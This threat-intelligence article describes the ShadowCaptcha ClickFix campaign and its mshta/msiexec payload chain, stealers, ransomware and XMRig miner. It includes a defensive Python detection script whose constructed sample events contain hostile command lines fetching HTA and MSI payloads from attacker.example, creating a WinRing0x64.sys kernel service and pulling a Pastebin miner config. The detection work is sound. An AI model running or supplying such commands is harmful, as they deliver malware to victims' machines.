A large-scale cybercrime campaign, ShadowCaptcha, is leveraging social engineering and sophisticated delivery methods to infect users with a variety of malicious payloads. First observed in August 2025 by the Israel National Digital Agency, this campaign stands out for its clever use of compromised WordPress sites to initiate a multi-stage attack. The core of the operation involves tricking unsuspecting victims into interacting with fake CAPTCHA verification pages. By blending social engineering with living-off-the-land binaries (LOLBins), ShadowCaptcha can gain and maintain a stealthy foothold on targeted systems. The campaign’s ultimate goal is to collect sensitive data, deploy cryptocurrency miners for illicit profits, or unleash devastating ransomware.
The initial vector of the ShadowCaptcha campaign is a compromised WordPress website that has been injected with malicious JavaScript code. When a user visits one of these infected sites, they are redirected to a convincing, but fake, Cloudflare or Google CAPTCHA page. This is where the ClickFix social engineering tactic comes into play. The fake CAPTCHA page presents instructions designed to mislead users into performing a specific action that will execute the malicious code. These instructions can take one of two paths: either guiding the victim to use the Windows Run dialog or instructing them to save the page as an HTML Application (HTA) and then run it using a legitimate Windows tool, mshta.exe.
The attack chain’s payload delivery is particularly insidious, utilizing legitimate Windows binaries to bypass security defenses. When a user follows the instructions to use the Windows Run dialog, the command executes an MSI installer or a remotely hosted HTA file. This action delivers information stealers like Lumma and Rhadamanthys. Alternatively, if the victim is tricked into saving and executing the HTA payload, they are infected with the Epsilon Red ransomware. This technique, previously documented by CloudSEK, cleverly relies on the user to unknowingly execute the malware. In some cases, the attack automatically copies a malicious command to the user’s clipboard using JavaScript, hoping they will paste and run it without realizing its true nature.
Beyond data theft and ransomware, ShadowCaptcha also deploys cryptocurrency miners to generate profits for the attackers. The campaigns have been observed delivering a crypto miner based on XMRig. In a display of technical sophistication, some variants are configured to fetch mining parameters from a Pastebin URL, allowing the attackers to modify mining settings on the fly. To further enhance their mining efficiency, the attackers drop a vulnerable driver, “WinRing0x64.sys,” to gain kernel-level access. This allows them to interact directly with CPU registers, optimizing the mining process and maximizing their illicit gains. The use of anti-debugger techniques and DLL side-loading also helps the attackers evade detection and maintain persistence on infected systems.
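An added detection example (it is not from the original article or from the researchers' report) that flags the process-creation signals the chain above leaves behind: mshta.exe or msiexec.exe launched from explorer.exe with a remote URL, as happens when a victim follows the Run-dialog instructions, an install of the WinRing0x64.sys driver, and a miner fetching its parameters from a Pastebin raw URL. The event records, the attacker.example domain and the PLACEHOLDER paste id are all constructed for the demonstration.

```python
import re

# Constructed sample process-creation events (parent, image, command line),
# modelled on the ShadowCaptcha chain described above. Not real telemetry;
# attacker.example and PLACEHOLDER are placeholders, not indicators.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "mshta.exe",
     "cmd": "mshta.exe https://attacker.example/verify.hta"},
    {"parent": "explorer.exe", "image": "msiexec.exe",
     "cmd": "msiexec.exe /i https://attacker.example/update.msi /qn"},
    # Benign: an admin-deployed local MSI should not fire.
    {"parent": "svchost.exe", "image": "msiexec.exe",
     "cmd": "msiexec.exe /i C:\\Installers\\vendor.msi /qn"},
    {"parent": "services.exe", "image": "sc.exe",
     "cmd": "sc.exe create winring0 binPath= C:\\Temp\\WinRing0x64.sys type= kernel"},
    {"parent": "cmd.exe", "image": "curl.exe",
     "cmd": "curl.exe https://pastebin.com/raw/PLACEHOLDER"},
]

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)

# explorer.exe as the parent is what the Run dialog (or a double-clicked
# saved file) produces; the remaining rules cover the payload stage.
RULES = [
    ("clickfix_mshta_remote",
     lambda e: e["image"].lower() == "mshta.exe"
               and bool(REMOTE_URL.search(e["cmd"]))),
    ("clickfix_msiexec_remote",
     lambda e: e["image"].lower() == "msiexec.exe"
               and e["parent"].lower() == "explorer.exe"
               and bool(REMOTE_URL.search(e["cmd"]))),
    ("vulnerable_driver_winring0",
     lambda e: "winring0x64.sys" in e["cmd"].lower()),
    ("miner_config_pastebin",
     lambda e: "pastebin.com/raw/" in e["cmd"].lower()),
]


def detect(events):
    """Return (rule_name, command line) for every event that matches a rule."""
    hits = []
    for e in events:
        for name, pred in RULES:
            if pred(e):
                hits.append((name, e["cmd"]))
    return hits


if __name__ == "__main__":
    for name, cmd in detect(SAMPLE_EVENTS):
        print(f"[{name}] {cmd}")
```

The local-MSI event is included so the msiexec rule is seen to require both the explorer.exe parent and a remote URL; tune the parent check to your environment if users legitimately run remote installers.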
The reach of the ShadowCaptcha campaign is global, with a majority of the infected WordPress sites located in Australia, Brazil, Italy, Canada, Colombia, and Israel. These compromised sites span various sectors, including technology, hospitality, legal/finance, healthcare, and real estate. While the exact method of initial compromise for these WordPress sites remains unconfirmed, researchers have high confidence that the attackers exploited known vulnerabilities in plugins or gained access using stolen credentials. To protect against this evolving threat, organizations and individuals must train users to recognize ClickFix campaigns, implement network segmentation to prevent lateral movement, and ensure all WordPress sites are secured with timely updates and multi-factor authentication (MFA). ShadowCaptcha is a stark reminder of how social engineering has evolved into a sophisticated, full-spectrum cyber operation.